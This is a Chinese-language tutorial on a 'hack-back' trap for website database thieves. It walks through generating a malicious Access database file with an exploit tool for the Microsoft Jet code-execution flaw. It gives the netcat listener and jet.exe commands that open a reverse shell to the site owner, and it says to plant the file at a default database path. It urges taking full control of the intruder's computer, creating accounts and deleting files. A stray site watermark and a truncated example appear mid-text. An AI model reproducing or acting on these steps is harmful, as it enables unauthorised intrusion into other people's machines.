数据库是一个网站的核心,也是入侵者入侵网站时最想得到的东西。他们会通过“暴库”或者注入攻击找到数据库的路径,从而非法下载到数据库,并从中获得包括管理员账户和密码在内的重要信息。对于一名站长而言,数据库被非法下载是一件极为苦恼的事。有没有想过给那些非法下载数据库的入侵者一个教训呢?在本文中你将找到答案。文章反击原理微软在2004年时曾公布过一个Windows漏洞,这个漏洞的全称为“Microsoft Jet数据库引擎中的漏洞可能允许代码执行”,受影响的系统几乎包含微软的全系列操作系统版本。入侵者可以通过这个漏洞构造恶意的数据库文件,当没有修补过漏洞的用户打开这个恶意的数据库文件时,将会执行黑客事先设置的任意代码。反过来思考,如果我们将这个漏洞利用起来,把构造好的恶意数据库文件设置为网站的数据库,故意暴露给黑客,这样当他们下载了数据库并打开时,反而成了我们的肉鸡。借漏洞工具设下陷阱利用这个漏洞我们要借助该漏洞的溢出程序jet.exe。运行下载jet.exe,解压到某个位置,例如“c:\”,然后点“开始→运行”,输入“cmd”运行“命令提示符”。在“命令提示符”中运行jet.exe。工具的利用方法有4种:0表示在本地测试漏洞;1表示利用反向连接利用漏洞;2的功能类似“下载者”,被溢出的主机主动从指定的网址处下载可执行文件并运行,对穿透防火墙很有用;3表示从本地下载可执行文件并运行。tw.wINgWit.cOM这里我们用第2种功能来进行测试。监听本地端口使用第2种方法,我们要监听一个本地端口。当黑客的主机溢出后会将一个Shell发送到我们监听的端口上。在“命令提示符”中运行黑客的“瑞士军刀”nc,输入如下命令“nc -vv -l -p 777”,回车后会显示“listening on [any] 777 ...”。这样就成功开始监听本机的777端口了。构造恶意数据库文件运行“命令提示符”,输入命令“ipconfig”,查看本机IP,假设这里为60.176.*.*。在“命令提示符”中运行jet.exe,输入命令“jet 2 60.176. *.* 777”,如果显示“Malformed db1.mdb file created. Now open with MSAccess.”,则表示命令执行成功。在同目录下会生成db1.mdb文件,这就是我们所需要的“恶意”数据库文件了。提示:很多使用ADSL上网的用户输入命令“ipconfig”后会出现两个IP地址,其中一个IP地址显示“192.168.0.1”。这个IP地址其实是内网的IP地址,属于一个保留的IP地址,外网访问不了这个地址,因此我们在测试时需要使用类似上文中的IP地址。故意暴露数据库路径目前黑客对下载网站数据库的途径很多,但最常用的伎俩就是使用网站程序的默认数据库路径,将路径加在网站域名后进行猜测。例如:生成一个mdb文件,然后放到该目录下。入侵者一般都会先使用默认路径来下载数据库,而一旦下载到数据库,就会被胜利沖昏头脑,很少会去判断数据库的真伪。而在他嘲讽该网站站长安全意识低下的同时,自己的电脑已经成为了别人的肉鸡。等入侵者自投罗网接下来的工作就是等待倒霉的入侵者来下载我们的数据库并运行了。当“恶意”数据库被打开时,对于入侵者来说,就等于打开了一个潘多拉盒子。返回查看nc监听的窗口,可以发现监听中的窗口已经有了反映,按一下“Enter”键,即可得到一个来自入侵者主机的Shell。由于对这个漏洞溢出后,我们默认得到的是最高权限,因此我们可以在入侵者的主机上建立账户,修改、删除任意文件。给入侵者一个沉痛的教训,让他偷鸡不成蚀把米。当然不能玩得过火,否则我们就是入侵者了。